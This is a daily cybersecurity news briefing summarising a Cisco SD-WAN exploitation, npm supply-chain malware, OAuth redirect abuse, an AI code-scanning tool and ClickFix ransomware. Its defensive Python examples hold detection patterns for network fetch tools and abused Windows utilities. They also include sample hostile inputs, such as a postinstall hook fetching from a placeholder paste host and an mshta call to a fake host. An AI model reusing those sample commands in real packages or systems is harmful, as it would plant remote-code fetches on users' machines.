
08/03/2026 Cyber Security Briefly News - Critical Threat Convergence: Exploited SD-WAN, AI-Powered Defense, and Evolving Malware Tactics

โฑ๏ธ Concise Cyber Intel: Time-Saving Strategic Analysis for Pros

Virusis.com is an independent cybersecurity intelligence publication that converts verified threat datasets into structured, technically grounded daily briefings. We do not aggregate headlines. We synthesize multi-source intelligence into concise, operationally relevant analysis designed for security teams and decision-makers.

📋 Top Headlines at a Glance

  1. SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 87
  2. Recent Cisco Catalyst SD-WAN Vulnerability Now Widely Exploited
  3. Week in review: Weaponized OAuth redirection logic delivers malware, Patch Tuesday forecast
  4. OpenAI Codex Security Scanned 1.2 Million Commits and Found 10,561 High-Severity Issues
  5. Termite ransomware breaches linked to ClickFix CastleRAT attacks

    Executive Summary: Today's intelligence highlights a critical and immediate threat: active exploitation of a Cisco Catalyst SD-WAN vulnerability, demanding urgent patching. Concurrently, the landscape reveals sophisticated malware campaigns leveraging supply chain vectors like npm packages and novel techniques such as OAuth redirection. On the defensive front, AI-powered security tools are emerging, demonstrating significant potential in vulnerability detection and penetration testing. Organizations must prioritize patching, enhance supply chain vigilance, and strategically evaluate AI integration to counter persistent ransomware and evolving attack methodologies.

๐ŸŒ Technical Intelligence Breakdown

📰 SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 87

This newsletter compilation provides insights into various malware-related activities and research. Key points include:

  • Supply Chain Compromise: The StegaBin campaign involves 26 malicious npm Packages that utilize Pastebin steganography to deploy a multi-stage credential stealer. This highlights the ongoing risk within software supply chains.
  • Browser-Based Threats: A new threat involves a fake Google security check that functions as a browser RAT (Remote Access Trojan), indicating continued social engineering and web-based attack vectors.
  • Emerging Malware: The newsletter also references SloppyLemming, suggesting new or notable malware activity. The dataset provides limited detail on SloppyLemming, but its inclusion signals a new threat to monitor.
  • Defensive Action: Organizations should implement strict supply chain security measures, including vetting npm dependencies, and educate users about phishing attempts disguised as security checks.
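One concrete form of the dependency vetting recommended above is to audit each package manifest for lifecycle hooks that npm runs automatically at install time, since a multi-stage loader of the kind described for StegaBin needs some such hook to execute before the package is ever imported. The script below is an added example written for this briefing, not code from Security Affairs or from any npm tooling; the hook names are npm's own, while the command patterns it treats as suspicious and the sample manifests are constructed assumptions.

```python
import re

# npm runs these scripts automatically during `npm install`; a dependency
# can execute arbitrary commands from them without ever being imported.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Assumed indicators (not from the briefing): the hook reaches out to the
# network or evaluates code it builds at run time.
NETWORK_RE = re.compile(r"https?://|\b(curl|wget|iwr|Invoke-WebRequest)\b", re.I)
EVAL_RE = re.compile(r"\beval\(|new Function\(|\bnode\s+(-e|--eval)\b")


def audit_manifest(name: str, manifest: dict) -> list:
    """Return one finding per lifecycle hook defined in a package manifest.

    Each finding lists why the hook deserves review. A hook with no extra
    reasons is still reported: install-time execution is itself the signal,
    and native modules (node-gyp) legitimately show up here too.
    """
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = ["runs automatically at install"]
        if NETWORK_RE.search(cmd):
            reasons.append("fetches remote content")
        if EVAL_RE.search(cmd):
            reasons.append("evaluates dynamically built code")
        findings.append({"package": name, "hook": hook, "command": cmd, "reasons": reasons})
    return findings


def audit_tree(manifests: dict) -> list:
    """Audit a {package_name: manifest_dict} map, e.g. built from node_modules/*/package.json."""
    out = []
    for name, manifest in manifests.items():
        out.extend(audit_manifest(name, manifest))
    return out


# Constructed sample manifests; package names and URLs are placeholders.
SAMPLE_TREE = {
    "left-pad-ish": {"scripts": {"test": "mocha"}},
    "native-thing": {"scripts": {"install": "node-gyp rebuild"}},
    "helpful-utils": {
        "scripts": {
            "postinstall": "node -e \"require('https').get('https://paste.invalid/raw/abc', r => r.pipe(process.stdout))\""
        }
    },
}

if __name__ == "__main__":
    for f in audit_tree(SAMPLE_TREE):
        print(f"{f['package']}: scripts.{f['hook']} -> {'; '.join(f['reasons'])}")
```

Treat the output as a review queue rather than a verdict: a native build step and a remote-fetching postinstall both appear, and the reasons column is what tells them apart. In a CI pipeline the same function can be run over every manifest under `node_modules` after `npm ci --ignore-scripts`, so hooks are inspected before they are ever allowed to run.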

โš ๏ธ Recent Cisco Catalyst SD-WAN Vulnerability Now Widely Exploited

A significant vulnerability, identified as CVE-2026-20127, affecting Cisco Catalyst SD-WAN is now being actively exploited in the wild.

  • Exploitation Status: Reports from watchTowr confirm widespread exploitation attempts originating from numerous unique IP addresses.
  • Attack Path: Unknown actor → Exploits CVE-2026-20127 → Compromises Cisco Catalyst SD-WAN infrastructure.
  • Criticality: Active exploitation of network infrastructure components like SD-WAN solutions poses a severe risk to network integrity and data confidentiality.
  • Defensive Action: Immediate patching of all Cisco Catalyst SD-WAN deployments is paramount. Organizations should also monitor network logs for indicators of compromise related to CVE-2026-20127 and implement network segmentation to limit potential lateral movement.

๐Ÿ—“๏ธ Week in review: Weaponized OAuth redirection logic delivers malware, Patch Tuesday forecast

This weekly review covers several important security developments:

  • Malware Delivery: Attackers are weaponizing OAuth redirection logic to deliver malware, indicating a sophisticated method to bypass traditional security controls by abusing legitimate authentication flows.
  • AI in Penetration Testing: The introduction of BlacksmithAI, an open-source AI-powered penetration testing framework, demonstrates the growing integration of AI into offensive security operations. This framework uses multiple AI agents coordinated by an orchestrator for various assessment stages.
  • Security Debt: The increasing issue of security debt is highlighted as a growing governance concern for CISOs, with application security backlogs expanding across large development environments.
  • Defensive Action: Review OAuth implementations for redirection vulnerabilities. Evaluate the implications of AI-powered pentesting tools for both defensive and offensive strategies. Address security debt proactively through secure development lifecycle (SDLC) integration and prioritization.
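The review of OAuth redirection logic recommended above usually comes down to one question: how does the authorization server match the `redirect_uri` in a request against the URIs the client registered? The added example below, written for this briefing rather than taken from the Help Net Security review or from any OAuth library, puts the common prefix-matching mistake beside an exact-match check so the difference is visible on concrete inputs. The registered URI and the test URIs are constructed placeholders.

```python
from urllib.parse import urlsplit

# Constructed: redirect URIs registered for a hypothetical OAuth client.
REGISTERED_REDIRECTS = {"https://app.example.com/oauth/callback"}


def weak_is_allowed(redirect_uri: str) -> bool:
    """Prefix matching, a common mistake: anything that merely begins with a
    registered URI is accepted, including paths, queries and fragments the
    client never registered."""
    return any(redirect_uri.startswith(r) for r in REGISTERED_REDIRECTS)


def canonical(uri: str):
    """Normalise an https URI to scheme + lower-cased host + port + path,
    or return None if it carries anything a registered redirect should not."""
    try:
        p = urlsplit(uri)
        port = p.port  # raises ValueError on a malformed port
    except ValueError:
        return None
    if p.scheme.lower() != "https" or not p.hostname:
        return None
    if p.username is not None or p.password is not None:
        return None  # user-info in the authority masks the real host
    if p.query or p.fragment:
        return None  # registered redirects carry neither
    host = p.hostname.lower()
    netloc = host if port in (None, 443) else f"{host}:{port}"
    return f"https://{netloc}{p.path or '/'}"


_REGISTERED_CANON = {canonical(r) for r in REGISTERED_REDIRECTS}


def strict_is_allowed(redirect_uri: str) -> bool:
    """Exact match against the registered set after normalisation."""
    c = canonical(redirect_uri)
    return c is not None and c in _REGISTERED_CANON


# Constructed test inputs: the first is the registered URI itself, the rest
# probe where prefix matching and exact matching diverge.
CASES = [
    "https://app.example.com/oauth/callback",
    "https://app.example.com/oauth/callback.attacker.example",
    "https://app.example.com/oauth/callback/../../open-redirect?to=x",
    "https://APP.example.com:443/oauth/callback",
    "https://app.example.com@attacker.example/oauth/callback",
    "http://app.example.com/oauth/callback",
]

if __name__ == "__main__":
    for uri in CASES:
        print(f"weak={weak_is_allowed(uri)!s:5} strict={strict_is_allowed(uri)!s:5} {uri}")
```

The second and third cases are accepted by the prefix check and rejected by the exact match; the fourth shows that exact matching still tolerates harmless normalisation such as host case and the default port. Exact matching is also what the OAuth 2.0 security guidance calls for, and the same canonical-form comparison should be applied anywhere an application performs its own post-login redirect.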

🤖 OpenAI Codex Security Scanned 1.2 Million Commits and Found 10,561 High-Severity Issues

OpenAI has launched Codex Security, an AI-powered security agent designed to identify, validate, and propose fixes for vulnerabilities within codebases.

  • Capabilities: Codex Security can build deep context about a project to pinpoint vulnerabilities.
  • Impact: In a recent scan, the tool analyzed 1.2 million commits and identified 10,561 high-severity issues, showcasing the potential of AI in large-scale code security analysis.
  • Availability: The feature is currently in a research preview for ChatGPT Pro, Enterprise, Business, and Edu customers via the Codex web, with free usage for a limited period.
  • Strategic Implication: This development signifies a major step towards automating vulnerability management and shifting security left in the development pipeline.
  • Defensive Action: Organizations should explore integrating AI-powered code analysis tools like Codex Security into their development workflows to enhance vulnerability detection and remediation efforts.

💥 Termite ransomware breaches linked to ClickFix CastleRAT attacks

Ransomware operations attributed to the threat actor Velvet Tempest are now linked to attacks involving the ClickFix technique and the CastleRAT backdoor.

  • Attack Chain: Velvet Tempest actors are deploying DonutLoader malware and the CastleRAT backdoor by leveraging the ClickFix technique, often utilizing legitimate Windows utilities to evade detection.
  • Malware Families: The primary ransomware observed is Termite ransomware.
  • Tactics, Techniques, and Procedures (TTPs): The use of legitimate Windows utilities is a common tactic to blend in with normal system activity and bypass security controls.
  • Defensive Action: Implement robust endpoint detection and response (EDR) solutions, enforce application whitelisting to prevent execution of unauthorized utilities, and conduct regular security awareness training to mitigate ClickFix and similar social engineering techniques. Monitor for unusual activity involving legitimate system tools.
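The recommendation to monitor for unusual activity involving legitimate system tools can be turned into a first-pass triage rule over process-creation telemetry. The example below is added for this briefing and is not code from Microsoft or any EDR vendor; the briefing names no specific utilities, so the watch-list, the "spawned by explorer.exe" heuristic (a process started interactively by the user, as a ClickFix lure induces) and the sample events are all constructed assumptions using Sysmon-style field names.

```python
import re
from ntpath import basename

# Assumed watch-list of Windows utilities commonly abused as living-off-the-land
# binaries; the briefing names none, so this set is the example's own.
WATCHED = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "regsvr32.exe",
    "cmd.exe", "wscript.exe", "cscript.exe", "certutil.exe", "curl.exe",
}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def triage(events):
    """Return (event_index, severity, reason) for each matching process event.

    Two weak signals are combined: a watched utility started directly by the
    desktop shell (interactive, user-driven launch) and a command line that
    carries a URL. Either alone is 'medium'; both together is 'high'.
    """
    findings = []
    for i, ev in enumerate(events):
        image = basename(ev.get("Image", "")).lower()
        parent = basename(ev.get("ParentImage", "")).lower()
        cmdline = ev.get("CommandLine", "")
        if image not in WATCHED:
            continue
        reasons = []
        if parent == "explorer.exe":
            reasons.append("watched utility launched interactively from explorer.exe")
        if URL_RE.search(cmdline):
            reasons.append("command line carries a URL")
        if not reasons:
            continue
        severity = "high" if len(reasons) == 2 else "medium"
        findings.append((i, severity, "; ".join(reasons)))
    return findings


# Constructed sample events (Sysmon Event ID 1 style fields); hosts are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://verify.invalid/check"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Editor\Code.exe",
     "CommandLine": r"powershell -File .\build.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad"},
]

if __name__ == "__main__":
    for idx, sev, why in triage(SAMPLE_EVENTS):
        print(f"[{sev}] event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']!r}: {why}")
```

Only the first and third events are reported: the editor-launched build script and the service-launched rundll32 look like routine use of the same binaries. The explorer.exe-parent signal on its own is noisy in environments where users open command shells routinely, which is why it scores medium and is meant to be combined with application allow-listing and the other signals an EDR already provides rather than to stand alone.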

📉 Threat Landscape & Trends

  • Active Exploitation: Critical vulnerabilities in widely used network infrastructure, such as Cisco Catalyst SD-WAN, are being actively exploited, necessitating immediate patching and robust incident response capabilities.
  • Sophisticated Malware Delivery: Attackers are increasingly leveraging advanced techniques like steganography within npm packages and abusing OAuth redirection logic to deliver malware, highlighting the need for enhanced supply chain and application security.
  • AI in Security: Artificial intelligence is rapidly advancing on both sides of the security spectrum. BlacksmithAI demonstrates AI's role in offensive penetration testing, while OpenAI Codex Security showcases its potential for large-scale, automated vulnerability detection and remediation.
  • Persistent Ransomware: Ransomware groups like Velvet Tempest continue to evolve their TTPs, employing legitimate tools and novel techniques (ClickFix) to deploy payloads like Termite ransomware and backdoors such as CastleRAT.
  • Security Debt as a Governance Issue: The growing backlog of application security issues is becoming a critical governance challenge for CISOs, impacting overall organizational risk posture.

📌 Strategic Takeaway

Organizations must adopt a proactive and multi-layered defense strategy, prioritizing immediate patching of known exploited vulnerabilities, strengthening supply chain security, and strategically integrating AI-powered tools to augment human analysts in both offensive and defensive security operations, all while addressing accumulating security debt as a critical governance imperative.
